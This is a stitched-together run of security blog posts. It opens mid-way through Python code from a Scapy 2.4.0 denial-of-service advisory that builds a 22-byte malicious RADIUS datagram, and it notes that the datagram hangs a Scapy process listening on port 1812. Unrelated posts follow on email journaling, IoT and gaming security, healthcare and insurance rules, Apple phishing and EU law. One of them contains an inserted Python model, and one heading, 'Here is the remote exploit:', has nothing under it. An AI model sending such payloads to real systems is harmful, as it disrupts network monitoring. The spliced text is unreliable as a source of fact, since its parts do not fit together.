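    the buffer, and truncated headers. length >= 2 guarantees progress."""
    attrs = []
    while remain:
        if len(remain) < 2:
            raise ValueError("truncated attribute header")
        attr_type, length = remain[0], remain[1]
        if length < 2:
            raise ValueError("invalid attribute length %d (minimum is 2)" % length)
        if length > len(remain):
            raise ValueError("attribute length %d exceeds %d remaining bytes" % (length, len(remain)))
        attrs.append((attr_type, remain[2:length]))
        remain = remain[length:]
    return attrs


def parse_outcome(parser, payload):
    """Parsed attribute list, or the exception class name if the parser refuses."""
    try:
        return parser(payload)
    except (RuntimeError, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    benign = build_radius_datagram(avp(1, b"alice") + avp(5, struct.pack("!I", 7)))
    malicious = build_radius_datagram(ZERO_LENGTH_AVP)   # 22 bytes: header + 2-byte AVP
    print("benign                       :", parse_outcome(parse_avps_fixed, radius_attributes(benign)))
    print("vulnerable on zero-length AVP:", parse_outcome(parse_avps_vulnerable, radius_attributes(malicious)))
    print("fixed on zero-length AVP     :", parse_outcome(parse_avps_fixed, radius_attributes(malicious)))
    # Sent as a UDP payload to port 1812 on a segment that a Scapy 2.4.0 process
    # is dissecting, `malicious` is the kind of datagram the advisory describes.
```

The 22-byte malicious datagram is all it takes: a valid header, then type 1 and length 0. The hardened loop rejects it on the first pass; the vulnerable loop appends an empty attribute and re-reads the same two bytes until the cap fires.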


Although this bug was reported and patched, the current Scapy release, version 2.4.0 as published on the Python Package Index (PyPI), is still susceptible to this attack. We tested for this vulnerability on macOS and Ubuntu Linux with both Python 2.7 and Python 3 and found all combinations vulnerable.

Here is the remote exploit:

Here is the patch:
https://github.com/secdev/scapy/pull/1409/files#diff-441eff981e466959968111fc6314fe93L1058
The solution: install Scapy directly from the GitHub repository:
https://github.com/secdev/scapy

Conclusion:

The current version of Scapy can be DoSed quite easily. The potential impact is large: Scapy is a popular tool, and other libraries that depend on Scapy might be vulnerable as well. Networks relying on Scapy for traffic monitoring or other functions can also be affected. If you're using the affected version of Scapy, or any library that depends on it, we advise you to apply the patch as soon as possible.

Advisory: Scapy 2.4.0 – Denial of Service
Authors: Johnathan Azaria and Koby Kilimnik
Vendor URL: https://scapy.net/
Status: Patched upstream (fix not yet released to PyPI)
Tested on: macOS sierra 10.12.6 and Ubuntu Linux 16.04


A partial list of libraries with a Scapy dependency that might be affected as well:

  • IcmpTool-0.1.8
  • jldcmds-0.3
  • mim-0.2.43 – man in the middle proxy
  • ooniprobe-1.3.2 – network analysis tool
  • pyersinia-1.0.5 – another network analysis tool
  • pysap-0.1.8 – python library that communicates with sap
  • scapy-http-1.8


The post Scapy-sploit: Python Network Tool is Vulnerable to Denial of Service (DoS) Attack CVE pending appeared first on Blog.

Be careful of data without context: The case of malware scanning of journaled emails

Recently, we shared details on how effectiveness is measured for Office 365 Exchange Online Protection (EOP) and Advanced Threat Protection (ATP). We also followed up with a comprehensive update on Office 365's improved ability to stop phishing emails from impacting users. These reports highlighted:

  • Enhanced anti-phish capabilities for EOP/ATP.
  • Visibility and transparency into our testing methods.
  • Performance improvements from the engineering updates.

Today, we'll cover recent research on a testing methodology, email journaling, which is often used but can lead to misinterpreted results.

What is email journaling?

Email journaling (Figure 1) is when an organization enables recording of emails for retention or archiving. With growing regulatory requirements, organizations increasingly must maintain records of communications between employees performing daily business tasks. Journaling helps organizations respond to legal, regulatory, and organizational compliance requirements by recording inbound and outbound email communications. Exchange Online offers in-depth journaling capabilities. Microsoft provides extensive and up-to-date recommendations on how organizations can manage and configure journaling requirements.

Figure 1. Email journaling mail flow.

The effect of journaling on email security

Sometimes we receive inquiries from customers seeking guidance on whether journaled email can be used to measure the effectiveness of our security solution. Sometimes, third-party vendors use journaled emails to assess effectiveness; however, this can lead to inaccurate results because there is a:

  1. Misunderstanding of how the email security protection stack is built in Office 365.
  2. Mischaracterization of a miss versus a catch because of #1.
  3. Misinterpretation of data to customers based on #1 and #2.

In this scenario, third-party vendors recommended that customers create a journaling rule routing emails to the vendor's testing cluster. The vendors then evaluated the emails with their advanced filters to determine which emails Office 365 ATP had missed. However, in Office 365, ATP protection, which includes Safe Attachments (file/URL detonation) and Safe Links (time-of-click protection), runs after the journaling rules. As a result, emails routed to a journaling archive have not yet been scanned by ATP's Safe Attachments or Safe Links policies (Figure 2). Our stack is designed so that journaling comes after the standard EOP anti-virus scans but before ATP scans, so known malicious emails are not archived. A good practice is to rescan emails released from an archive to help ensure they are not malicious.

Figure 2. The top graphic shows the entire mail flow and security stack in EOP/ATP, while the bottom graphic is a blowup of the section that shows where the journaling rule takes effect and how it is before our Safe Attachments/URL sandboxing policy, which is part of Office 365 ATP.

Helping ensure our customers’ security

When journaled mail is used to measure effectiveness, it's important to remember that the emails have not been scanned by ATP, since journaling happens before ATP. Figure 3 shows how measuring journaled emails for effectiveness produces a misleading analysis: most emails thought to have been missed were in fact blocked by ATP, and a large share of the emails that ATP did not block were false positives in the third party's results.

Figure 3. The emails characterized as misses never went through the ATP filters. When we ran them through ATP, we found that ATP blocked most of them, and that many of the emails it let through were benign (false positives in the third-party results).

There have been situations where customers were advised by third parties to use journaled emails to identify emails missed by Office 365 ATP, which is impossible due to the architecture of Office 365's mail flow. As with any service, Office 365 ATP also misses some emails. No service is 100 percent secure, but the best services are able to enhance and evolve quickly to address emerging threats. This ability to quickly enhance our services is one of our strengths and is manifest in the rapid evolution of Office 365 ATP into the optimal security service for Office 365.
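To make the measurement error concrete, here is an added model (not Microsoft's code or telemetry) of the stage ordering described above: EOP anti-virus, then the journaling tap, then ATP. The stage functions, the message fields and the sample messages are all hypothetical stand-ins; the point is how a vendor reading only the journal feed would count "misses" versus what actually reached a mailbox, and what the suggested rescan-on-release would catch.

```python
from dataclasses import dataclass
from enum import Enum


class Verdict(Enum):
    BLOCKED_EOP_AV = "blocked by EOP anti-virus"
    BLOCKED_ATP = "blocked by ATP (Safe Attachments / Safe Links)"
    DELIVERED = "delivered to mailbox"


@dataclass(frozen=True)
class Message:
    msg_id: str
    malicious: bool         # ground truth, used only when scoring the report
    known_signature: bool   # hypothetical: caught by signature-based EOP anti-virus
    detonates: bool         # hypothetical: caught by ATP detonation or time-of-click check
    vendor_flags: bool      # hypothetical: what the third-party filter says about it


def eop_antivirus(msg: Message) -> bool:
    """Stand-in for the standard EOP anti-virus stage (runs before journaling)."""
    return msg.known_signature


def atp_scan(msg: Message) -> bool:
    """Stand-in for Safe Attachments / Safe Links, which run after journaling."""
    return msg.detonates


def run_mail_flow(messages):
    """Apply the stages in the order the post describes: EOP AV, journal tap, ATP."""
    verdicts, journal = {}, []
    for m in messages:
        if eop_antivirus(m):
            verdicts[m.msg_id] = Verdict.BLOCKED_EOP_AV
            continue                      # known-bad mail never reaches the archive
        journal.append(m)                 # the journaling rule copies the message here
        verdicts[m.msg_id] = Verdict.BLOCKED_ATP if atp_scan(m) else Verdict.DELIVERED
    return verdicts, journal


def vendor_report(journal):
    """What a vendor testing only the journal feed would label 'ATP misses'."""
    return [m.msg_id for m in journal if m.vendor_flags]


def actual_misses(messages, verdicts):
    """Malicious mail that really reached a mailbox after the full stack."""
    return [m.msg_id for m in messages if m.malicious and verdicts[m.msg_id] is Verdict.DELIVERED]


def explain_claimed_misses(messages, verdicts, claimed):
    """Split the vendor's claimed misses into what each one actually is."""
    by_id = {m.msg_id: m for m in messages}
    out = {"blocked_by_atp": [], "false_positive": [], "genuine_miss": []}
    for mid in claimed:
        if verdicts[mid] is Verdict.BLOCKED_ATP:
            out["blocked_by_atp"].append(mid)
        elif not by_id[mid].malicious:
            out["false_positive"].append(mid)
        else:
            out["genuine_miss"].append(mid)
    return out


def rescan_on_release(journal):
    """The post's suggested practice: rescan archived mail before releasing it."""
    return [m.msg_id for m in journal if atp_scan(m)]


# Constructed sample set, not real data: m1 is signature-known, m2/m3/m8 need
# detonation, m4/m5 are benign mail the vendor flags, m6 slips past everything.
SAMPLE = [
    Message("m1", malicious=True,  known_signature=True,  detonates=True,  vendor_flags=True),
    Message("m2", malicious=True,  known_signature=False, detonates=True,  vendor_flags=True),
    Message("m3", malicious=True,  known_signature=False, detonates=True,  vendor_flags=True),
    Message("m4", malicious=False, known_signature=False, detonates=False, vendor_flags=True),
    Message("m5", malicious=False, known_signature=False, detonates=False, vendor_flags=True),
    Message("m6", malicious=True,  known_signature=False, detonates=False, vendor_flags=True),
    Message("m7", malicious=False, known_signature=False, detonates=False, vendor_flags=False),
    Message("m8", malicious=True,  known_signature=False, detonates=True,  vendor_flags=False),
]


def analyse(messages=SAMPLE):
    verdicts, journal = run_mail_flow(messages)
    claimed = vendor_report(journal)
    return {
        "claimed_misses": claimed,
        "explained": explain_claimed_misses(messages, verdicts, claimed),
        "actual_misses": actual_misses(messages, verdicts),
        "would_block_on_release": rescan_on_release(journal),
    }
```

On the sample set the journal-only report claims five misses, of which two were blocked by ATP and two are benign; only one message really reached a mailbox.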

Flipping the script

Interestingly, customers often provide us with email samples already scanned by a third-party vendor's advanced filters to determine how Office 365 ATP would perform on the same set of emails. Figure 4 shows the unique catch of ATP versus a third-party vendor in one such inquiry. In that inquiry, Office 365 ATP found 18 times more unique malicious emails than the third-party vendor. Also, with phishing being a predominant form of attack, we saw that the third-party vendor missed several hundred phishing emails.

Figure 4. Office 365 ATP's unique catch rate is 18 times greater than a third-party vendor's, from a recent comparison of data shared with Microsoft by a customer.

How do I know which data to trust?

We don't look for gaps in third-party services unless a customer asks us to investigate. Our focus is on enhancing our service to help provide maximum security for our customers. We don't claim to catch everything; however, we are confident that no other service will secure you better in Office 365 than Office 365 ATP. Put us to the test with a trial. We have previously suggested that bifurcating real mail flow will provide a side-by-side analysis on effectiveness. This is the most powerful and informative test.

Begin an Office 365 E5 trial today to experience best-in-class security for your Office 365 environment and contact your rep to help you test us against any competitor. The results will serve as the ultimate validation that Office 365 ATP provides the best security for your Office 365 environment.

The post Be careful of data without context: The case of malware scanning of journaled emails appeared first on Microsoft Secure.

How to Protect Three Common IoT Devices in 2019

It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this week, we turn our focus toward the year ahead and take a look at some of the IoT devices that are particularly high-profile targets for cybercriminals: gaming systems, voice tech, routers, and smart cars.

Routers

Routers are very susceptible to attacks as they often come with factory-set passwords that many owners are unaware of or don’t know how to change, making these devices easy targets for hackers. That’s bad news, since a router is the central hub in a connected home. If a router is compromised and all of the devices share the same Wi-Fi network, then they could potentially all be exposed to an attack. How? When an IoT device talks to its connected router, the device could expose many of its internal mechanisms to the internet. If the device does not require re-authentication, hackers can easily scan for devices that have poorly implemented protocols. Then with that information, cybercriminals can exploit manufacturer missteps to execute their attacks. To help protect your router (and thus all your other devices), a best practice is to consider one with a layer of protection built-in, and be sure to use a long and complex password for your Wi-Fi network.

Gaming Systems

Over ten years ago, researchers found that many video gaming consoles were being distributed with major security issues involving the Universal Plug and Play protocol (UPnP), a feature that allows IoT devices on a network to see each other and interact with one another. However, not much has been done to solve the problem. By exploiting the UPnP weaknesses in gaming systems to reroute traffic over and over again, cybercriminals have been able to create “multi-purpose proxy botnets,” which they can use for a variety of purposes. This is just the jumping-off point for malicious behavior by bad actors. With this sort of access into a gaming system, they can execute DDoS attacks, malware distribution, spamming, phishing, account takeovers, click fraud, and credit card theft. Our recent gaming survey found that 64% of respondents either have or know someone who has been directly affected by a cyberattack, which is an astonishing uptick in attacks on gamers. Considering this shift, follow our tips in the section above for routers and Wi-Fi, never use the same password twice, and be wary of what you click on.

Voice Tech

In 2018, 47.3 million adults had access to smart speakers or voice assistants, making them one of the most popular connected devices for the home. Voice-first devices can be vulnerable largely because of what we connect them to for convenience: delivery, shopping, and transportation services that leverage our credit cards. While it’s important to note that voice-first devices are most often compromised within the home by people who have regular access to your devices (such as kids) when voice recognition is not properly configured, any digital device can be vulnerable to outside attacks too if proper security is not set up. For example, these always-on, always-listening devices could be infiltrated by cybercriminals through a technique called “voice squatting.” By creating “malicious skills,” hackers have been able to trick voice assistants into continuing to listen after a user finishes speaking. In this scenario an unsuspecting person might think they’re connecting to their bank through their voice device, when unbeknownst to them, they’re giving away their personal information. Because voice-controlled devices are frequently distributed without proper security protocols in place, they are the perfect vehicle for executing a cyberattack on an unsuspecting consumer. To protect your voice assistants, make sure your Wi-Fi password is strong, and be on the lookout for suspicious activity on linked accounts.

While you can’t predict the future of IoT attacks, here are some additional tips and best practices on how to stay ahead of hackers trying to ruin your year:

  • Keep your security software up-to-date. Software and firmware patches are always being released by companies and are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
  • Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for smart cars and other IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security.
  • Change your device’s factory security settings. This is the single most important step to take to protect all devices. When it comes to products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as opening the box. By changing the factory settings you’re instantly upgrading your device’s security.
  • Use best practices for linked accounts. For gaming systems and voice-first devices in particular, if you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
  • Set up a separate IoT network. Consider setting up a second network for your IoT devices that doesn’t share access to your other devices and data. Check your router manufacturer’s website to learn how. You might also consider adding another network for guests and unsecured devices from others. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.
  • Use a firewall. A firewall is a tool that monitors traffic between an Internet connection and devices to detect unusual or suspicious behavior. Even if a device is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. When looking for a comprehensive security solution, see if a firewall is included to ensure that your devices are protected.
  • Up your gaming security. Just announced at CES 2019, we’re bringing a sense of security to the virtual world of video games. Get in on the action with the McAfee Gamer Security beta; it’s free!

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post How to Protect Three Common IoT Devices in 2019 appeared first on McAfee Blogs.

HHS Publishes Voluntary Healthcare Cybersecurity Practices for Medical Organizations

The U.S. Department of Health and Human Services (HHS) released voluntary healthcare cybersecurity practices to help medical organizations strengthen their security posture.

On December 28, HHS released “Health Industry Cybersecurity Practices (HICP): Managing Threats and Protecting Patients” in response to a mandate to develop healthcare cybersecurity standards laid out by the Cybersecurity Act of 2015. More than 150 cybersecurity and healthcare experts from the private and public sectors worked together for two years to fulfill this directive.

The publication is broken down into three sections. The first examines cybersecurity threats confronting the healthcare industry. The second portion identifies weaknesses that render healthcare organizations vulnerable to threats, and the third and final segment outlines strategies that medical entities can use to defend against digital threats.

Healthcare Data Breaches on the Rise

Healthcare data breaches are on the rise. In a study published by the JAMA Network, researchers analyzed all the data security incidents reported to the Office of Civil Rights at HHS between January 2010 and December 2017. They found a total of 2,149 breaches affecting 176.4 million patient records. The annual number of data breaches increased each year during the analyzed time period except 2015, starting with 199 in 2010 and growing to 344 in 2017.

Of the incidents that exposed patients’ personal health information (PHI), 53 percent originated inside the organization. That’s consistent with the Office of the Australian Information Commissioner’s (OAIC) quarterly statistics for Q3 2018. OAIC received 45 data breach notifications from healthcare organizations during the quarter, 56 percent of which resulted from human error.

Healthcare Cybersecurity Best Practices

Security professionals can begin enforcing healthcare cybersecurity best practices by producing creative employee awareness content that specifically appeals to the company’s workforce. Healthcare organizations should also adopt a security immune system strategy that, among other things, uses artificial intelligence (AI) and automation to mitigate risk across the network.

The post HHS Publishes Voluntary Healthcare Cybersecurity Practices for Medical Organizations appeared first on Security Intelligence.

Kicking off CES 2019 with New Security Solutions and Collaborations

Today, we at McAfee are announcing some exciting new security solutions and integrations at CES in Las Vegas. For those of you who are unfamiliar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. McAfee now delivers protection to more than 500 million customers worldwide, and we understand the importance of creating new solutions for those who want to live their connected lives with confidence. To help empower our customers to do this, we’ve added to our security lineup and are working with other tech innovators who understand the importance of protecting users’ online safety.

One addition to our lineup of security solutions is McAfee Gamer Security. In a recent gaming survey, we discovered that 75% of gamers are worried about the security of gaming as online threats continue to rise. To help combat these threats, we developed McAfee Gamer Security, which protects gamers while optimizing their gaming experience. Some of the product’s key features include Game Mode, a gamer-centric interface, and minimal security resource consumption. These features help optimize gamers’ computing resources, provide system status updates, and equip users with lightweight security protection.

In addition to our latest product advancements, we’ve also teamed up with other companies looking to better the cybersecurity landscape for consumers. The first is Google. In order to further simplify the process of securing today’s connected home, McAfee will provide McAfee Secure Home Platform voice commands for the Google Assistant. McAfee Secure Home Platform provides an extra layer of security to help automatically protect all of the connected devices on the user’s home network. Soon, Google Assistant users can easily manage their connected home security by just using their voice.

While it’s important to secure the connected home, it is also important to protect your mobile and IoT devices. According to McAfee Labs 2019 predictions, cybercriminals will leverage trusted devices like smartphones and tablets to try to access users’ IoT devices in the upcoming year. To help customers stay safeguarded from this threat, we’ve teamed up with Verizon to protect their home networks through Verizon Home Network Protection. This McAfee-powered solution helps Verizon Fios customers stay secure against malicious websites, provides parental controls, and protects all devices connected to their home network.

Furthermore, we at McAfee and Dell have teamed up to protect consumers and small businesses as they enjoy the benefits of today’s technology. To do this, we’ve expanded our collaboration to provide pre-installed McAfee software on PCs and laptops globally to both consumer and small business customers. Customers who purchase a new laptop or PC will also have the option to extend McAfee protection beyond their Dell device to their smartphones and tablets. This allows users to have a more robust security shield around all of their connected devices, creating a safer overall online experience. Dell consumer and small business customers who purchase Dell Inspiron, XPS, Vostro, and G-Series laptops will receive a 30-day or 1-year subscription. Customers who purchase Alienware, OptiPlex, Latitude, and Precision will have the option of adding a 30-day free subscription or purchasing a 1-year subscription.

Another one of our latest innovations is the addition of Cryptojacking Blocker to McAfee WebAdvisor. As we observed in our latest McAfee Labs report, coin mining malware is on the rise, growing more than 4000% in the last year. Cryptojacking Blocker helps protect users from having their devices hijacked without their knowledge or permission. The tool helps prevent websites from mining for cryptocurrency and is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

So far, CES 2019 has proven that innovation will continue to evolve, just as the cybersecurity landscape will continue to mature. By working together to improve the technology that protects connected devices, we can help users optimize their digital life without compromising their online safety.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking off CES 2019 with New Security Solutions and Collaborations appeared first on McAfee Blogs.

Cybersecurity Rules for Insurance Companies to Take Effect in South Carolina

New cybersecurity rules for insurance companies licensed in South Carolina are set to take effect in part on January 1, 2019. The new law is the first in the United States to be enacted based on the data security model law drafted by the National Association of Insurance Commissioners. The law requires licensed insurance companies to notify state insurance authorities of data breaches within 72 hours of confirming that nonpublic information in the company’s (or a service provider’s) system was “disrupted, misused, or accessed without authorization.” The breach reporting requirement is in addition to notification obligations imposed under South Carolina’s breach notification law and applies if the insurance company has a permanent location in the state or if the breach affects at least 250 South Carolina residents, among other criteria. The 72-hour notice requirement takes effect January 1, 2019.

Separately, effective July 1, 2019, the law requires insurance companies licensed in South Carolina to develop and implement a comprehensive, written cybersecurity program. Among other details, the program must be based on a company’s own risk assessments and must include encryption of information in transit, regular testing of systems, and cybersecurity awareness training for employees. The law will also require insurance companies to “exercise due diligence” in choosing third-party service providers and to ensure that service providers have appropriate information safeguards in place no later than July 1, 2020.

Level Up Your Cybersecurity: Insights from Our Gaming Survey

Online gaming has seen a rise in popularity over the years. Many people see it as a way to unwind from a stressful day or complete new challenges. However, just like any other internet-connected channel, online gaming can expose users to a variety of cybersecurity risks. So, to examine the relationship between cybersecurity and gaming, we decided to survey 1,000 U.S. residents ages 18 and over who are frequent gamers.*

Time to Upgrade Your Online Safety

Of those surveyed, 75% of PC gamers chose security as the element that most concerned them about the future of gaming. This makes sense since 64% of our respondents either have or know someone who has been directly affected by a cyberattack. And while 83% of the gamers do use an antivirus software to protect their PCs, we found that gamers still participate in risky online behavior.

Poor Habits Could Mean Game Over for Your Cybersecurity

So, what does this risky behavior look like, exactly? The following sums it up pretty well:

  • 55% of gamers reuse passwords for multiple online accounts, leading to greater risk if their password is cracked.
  • 36% of respondents rely on incognito mode or private browsing to keep their PC safe.
  • 41% read the privacy policies associated with games, though this technique won’t help to keep their device secure.

With these lax habits in place, it’s not hard to believe that 38% of our respondents experienced at least one malicious attack on their PC. And while 92% installed an antivirus software after experiencing a cyberattack, it’s important for gamers to take action against potential threats before they occur.

Level Up Your Gaming Security

Now the question is – what do these gamers need to do to stay safe while they play? Start by following these tips:

  • Do not reuse passwords. Reusing passwords makes it easier for hackers to access more than one of your accounts if they crack one of your logins. Prevent this by using unique login credentials for all of your accounts.
  • Click with caution. Avoid interacting with messages from players you don’t know and don’t click on suspicious links. Cybercriminals can use phishing emails to send gamers malicious files and links that can infect their device with malware.
  • Use a security solution. Using a security service to safeguard your devices can help protect you from a variety of threats that can disrupt your gaming experience. Look out for our newest product McAfee Gamer Security, which we launched just in time for CES 2019. Although this product is still in beta mode, it could be used to combat cyberthreats while optimizing your computing resources.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

*Survey respondents played video games at least four times a month and spent at least $200 annually on gaming.

The post Level Up Your Cybersecurity: Insights from Our Gaming Survey appeared first on McAfee Blogs.

Hackers defeat vein authentication by making a fake hand

Biometric security has moved beyond just fingerprints and face recognition to vein-based authentication. Unfortunately, hackers have already figured out a way to crack that, too. According to Motherboard, security researchers at the Chaos Communication Congress hacking conference in Leipzig, Germany showed how they used a model wax hand to defeat a vein authentication system.

Source: Motherboard

Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

Agreement on Proposal for Cybersecurity Act

The European Commission (“Commission”), the European Parliament (“Parliament”) and the Council of the European Union reached an agreement earlier this month regarding changes to the Proposal for a Regulation on ENISA, the “EU Cybersecurity Agency”, and repealing Regulation (EU) 526/2013, and on Information and Communication Technology Cybersecurity Certification (the “Cybersecurity Act”). The agreement empowers the EU Cybersecurity Agency (known as the European Union Agency for Network and Information Security, or “ENISA”) and introduces an EU-wide cybersecurity certification for services and devices.

Background

The Cybersecurity Act was introduced in a wide-ranging set of cybersecurity measures adopted by the Commission on September 13, 2017, and proposed as a priority of the Digital Single Market Strategy. The objective of these measures was to deal with cyber-attacks and build strong cybersecurity in the EU.

More Powers for ENISA

The Cybersecurity Act reinforces ENISA’s central role in supporting Member States when they face cybersecurity threats or attacks. The Cybersecurity Act grants more powers to and new tasks for ENISA, including:

  • A permanent mandate. The initial temporary mandate was due to end in 2020 and is now replaced by a permanent mandate. More resources will also be allocated to ENISA to accomplish its tasks.
  • To prepare the EU for a crisis response to major cyberattacks.
  • To assist Member States in responding effectively to cyber-attacks with a greater cooperation and coordination at the EU level.

ENISA will also be recognized as an independent center of expertise that will promote awareness to citizens and businesses and that will assist the EU institutions and Member States in the development and implementation of policies.

Cybersecurity Certification Framework